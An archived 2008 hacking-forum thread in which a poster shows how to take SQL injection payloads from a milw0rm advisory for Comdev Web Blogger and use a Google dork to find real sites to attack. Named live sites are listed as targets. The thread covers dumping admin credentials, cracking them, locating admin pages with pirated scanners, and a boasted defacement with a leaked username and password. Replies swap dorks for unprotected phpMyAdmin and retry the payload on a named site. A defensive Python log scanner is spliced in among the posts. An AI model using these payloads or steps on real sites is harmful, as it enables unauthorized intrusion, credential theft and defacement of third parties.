
How to use Milw0rm.com

Discussion in 'Ethical hacking Tips' started by XXxxImmortalxxXX, Jul 18, 2008.

  1. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Hello guys, I see people always asking me how to use milw0rm.com, so I figured I will show you all.

    Today we are going to learn the web applications part of milw0rm.com

    So

    Let's go to Milw0rm, shall we?

    Now go to web applications and you see a whole lot of stuff, right? We're gonna look for an SQL injection vulnerability.

    We found this okay right here

    And it shows you the following

    Code:
    ____________________   ___ ___ ________
    \_   _____/\_   ___ \ /   |   \\_____  \  
     |    __)_ /    \  \//    ~    \/   |   \ 
     |        \\     \___\    Y    /    |    \
    /_______  / \______  /\___|_  /\_______  /
            \/         \/       \/         \/ 
    
                                            .OR.ID
    ECHO_ADV_100$2008
    
    -----------------------------------------------------------------------------------------
    [ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
    -----------------------------------------------------------------------------------------
    
    Author       : M.Hasran Addahroni
    Date         : July, 14 th 2008
    Location     : Jakarta, Indonesia
    Web          : http://e-rdc.org/v1/news.php?readmore=102
    Critical Lvl : Medium
    Impact       : System access
    Where        : From Remote
    ---------------------------------------------------------------------------
    
    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Application : Comdev Web Blogger
    version     : <= 4.1.3
    Vendor      : http://www.comdevweb.com/blogger.php
    Description :
    
    Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
    Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
    the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs, 
    Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
    Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with 
    CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
    Set Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders • 
    Installation Support available
    
    ---------------------------------------------------------------------------
    
    Vulnerability:
    ~~~~~~~~~~~~~
    
    Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used 
    in an SQL query.
    This can be exploited through the browser to manipulate SQL queries and pull the username and password
    from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.
    
    
    Poc/Exploit:
    ~~~~~~~~~
    
    http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
    http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
    
    Admin Login at http://www.example.com/[PATH]/oneadmin/
    
    Dork:
    ~~~~
    Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"
    
    
    Solution:
    ~~~~~~
    
    - Edit the source code to ensure that input is properly verified.
    - Turn on magic_quotes in php.ini
    
    
    Timeline:
    ~~~~~~~~
    
    - 11 - 07 - 2008 bug found
    - 11 - 07 - 2008 vendor contacted
    - 14 - 07 - 2008 advisory released
    ---------------------------------------------------------------------------
    
    Shoutz:
    ~~~~
    ~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
    ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
    the_hydra,neng chika, str0ke
    ~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
    ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
    super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
    ~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
    kuntua, stev_manado,nofry,k1tk4t,0pt1c
    ~ newbie_hacker@yahoogroups.com
    ~ #aikmel #e-c-h-o @irc.dal.net
    
    ---------------------------------------------------------------------------
    Contact:
    ~~~~~
    
    K-159 || echo|staff || eufrato[at]gmail[dot]com
    Homepage: http://www.e-rdc.org/
    
    -------------------------------- [ EOF ] ---------------------------------- 
    
    # milw0rm.com [2008-07-15]
    
    Now look at

    Code:
    http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
    http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
    
    This is the SQL injection into the site; there are 2 separate ones, and under that is the DORK:

    Code:
    "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"
    The dork is what you are going to type into Google or whatever search engine you want, and the search engine will give you a list of websites that are powered by that. So go into your search engine and paste that, or type

    Code:
    allinurl:".php?domain= arcyear=2007 arcmonth
    So you see a whole bunch of websites, right? And you're looking for the dork, so the websites listed are below

    www.manilatimes.net.ph/index.php?domain=&arcyear=2007&arcmonth=6

    www.ravendrumfoundation.org/whatsnew.php?domain=&arcyear=2007&arcmonth=9

    www.shiptalkforum.com/index.php?domain=&arcyear=2007&arcmonth=5

    And if you remember, the dork you were looking for was the .php?domain=&arcyear=2007&arcmonth=6

    So you got all the sites that Google provided, so look for any site that has the dork and click it. Now once you are at that site, get the SQL injection code and paste it in the URL where it says arcmonth=6; paste it after the =, remember to delete the 6 though, so it will look like this

    http://wealthbeing.co.uk/blog.php?d...ername,0x3a,password),3,4,5,6 from sys_user--

    We hit enter and you see the admin username and password along with other users as well. That password is encrypted, so use John the Ripper or Cain and Abel to decrypt it, and then you will have to find the admin login page. I would 1. go through every link, right click, view source and look for an admin login page; if it's not there, get the cracked version of Acunetix and scan that website and it will show you the admin page. Then you can just login and do whatever you want. Below is a site that I did as a demonstration, and let's go to the following site

    HACKED BY XXxxImmortalxxXX

    Now what I did was SQL inject the site and it gave me the following

    admin::imagert26

    Which was the username and password, and I dunno why it wasn't encrypted. Anyways, it said look for /oneadmin; well, oneadmin wasn't there

    So then we go through every link looking at the source code, looking for a login page. Didn't find one. My last step was to scan the site with all of its links

    I did and I got

    /cms/index.php?

    which was the login. I think they tried to hide it lol

    So we then login and do whatever we want. Hope this tut helps
     
    Last edited by a moderator: Jul 18, 2008
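The advisory's Solution section says the `arcmonth` input must be verified before it reaches the query; as an added example (not from this thread, milw0rm or Comdev), here is a Python check a site operator could run over web-server access logs to spot requests of the shape shown above, using constructed log lines that mirror the advisory's two URL forms.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (not real traffic). Lines 2 and 3
# mirror the two URL shapes the advisory above describes.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jul/2008:10:01:02 +0000] "GET /blog.php?domain=&arcyear=2007&arcmonth=6 HTTP/1.1" 200 5120
203.0.113.9 - - [14/Jul/2008:10:01:07 +0000] "GET /blog.php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user-- HTTP/1.1" 200 7331
203.0.113.9 - - [14/Jul/2008:10:01:09 +0000] "GET /blog.php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/* HTTP/1.1" 200 7290
203.0.113.7 - - [14/Jul/2008:10:02:00 +0000] "GET /blog.php?domain=&arcyear=2007&arcmonth=12 HTTP/1.1" 200 5100
"""

# Common-log-format request line: client IP, timestamp, method and URL.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*"')
# The archive selectors are plain integers in the vulnerable page; anything else is suspect.
NUMERIC_PARAMS = {"arcyear": (1970, 2100), "arcmonth": (1, 12)}
SQL_TOKENS = re.compile(r"\b(union|select|concat|from)\b|--|/\*", re.IGNORECASE)

def check_request(url):
    """Return the reasons a request looks like the arcmonth injection (empty list if clean)."""
    reasons = []
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, (lo, hi) in NUMERIC_PARAMS.items():
        for raw in query.get(name, []):
            value = unquote_plus(raw)  # parse_qs already decoded once; this catches double encoding
            if not value.isdigit() or not lo <= int(value) <= hi:
                reasons.append(f"{name}={value!r} is not an integer in [{lo}, {hi}]")
            if SQL_TOKENS.search(value):
                reasons.append(f"{name} carries SQL keywords or comment markers")
    return reasons

def scan_log(text):
    """Parse access-log text and return (ip, url, reasons) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reasons = check_request(m.group("url"))
        if reasons:
            hits.append((m.group("ip"), m.group("url"), reasons))
    return hits

if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(ip, url, reasons)
```

Neither URL in the advisory contains a quote character, so the magic_quotes setting the advisory also suggests would not have blocked them; an integer range check on the parameter is what actually closes the hole.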
  2. shabbir

    shabbir Administrator Staff Member

    Hey I was able to open that URL now and gr8 job. I hope you notified the users before putting that up there.

    Also remember Content Copyright of Users everything else Copyright © Go4Expert.com, 2004 - 2008.
     
  3. P455w0rd_Cr4kz

    P455w0rd_Cr4kz New Member

    Hello Shabbir, I sent xximmortalxx a simple search string for Google that will give you lots and lots of phpMyAdmin without passwords; amazing how careless people can be sometimes.
     
  4. shabbir

    shabbir Administrator Staff Member

    Why not give to me as well?
     
  5. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

  6. evilone

    evilone New Member

    Good share, until I saw this post I didn't have an idea how I can use the exploits provided in milw0rm.... Now let me make my trials and get some knowledge on using this stuff.... Thanks for sharing
     
  7. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    No problem mate
     
  8. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    LoL faggits posted this tutorial on their site without giving me any credit lol

    h*tp://www.is-sw.net/vb/showthread.php?t=5617
     
    Last edited by a moderator: Oct 2, 2008
  9. shabbir

    shabbir Administrator Staff Member

    Register there and post a link to this one of yours. Admin may look at it.

    Also I edited your link so that it's unclickable
     
  10. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    I did register, and you want me to post a link on their site? To this one?
     
  11. shabbir

    shabbir Administrator Staff Member

    Not exactly. Claim it to be your article and that the guy has copied it, and to prove that you have the original you may want to show him the date here.
     
  12. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    OHH MY GOD this guy said HE MADE THIS TUTORIAL AND WHERE IT SAYS

    ht*p://casihacks.info/index.php?showtopic=476&st=0&gopid=1220&#entry1220


    U MUST REGISTER

    HACKED BY Casi (ht*p://www.tertuliamagazine.com/) Old tutorial,the site is now running again!


    look in my tutorial, it says that I hacked it. OHH MY GOD THIS IS PISSING ME off when they steal this crap
     
    Last edited by a moderator: Oct 17, 2008
  13. indiansword

    indiansword Security Expert

    I really don't think this is working because I tried this

    Code:
     iexplore http://wealthbeing.co.uk/blog.php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,passwo rd),3,4,5,6%20from%20sys_user-- 
    but it doesn't do anything,

    it just brings up the normal website

    Neither did I understand what to put in the search.
     
  14. indiansword

    indiansword Security Expert

    no answer?
     
  15. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    That site has probably been updated; try another
     
  16. indiansword

    indiansword Security Expert

    That's what I ain't sure about... WHICH sites to test... if you search in Google, 0 results :|
     
  17. jose133t

    jose133t New Member

    :cryin:
     
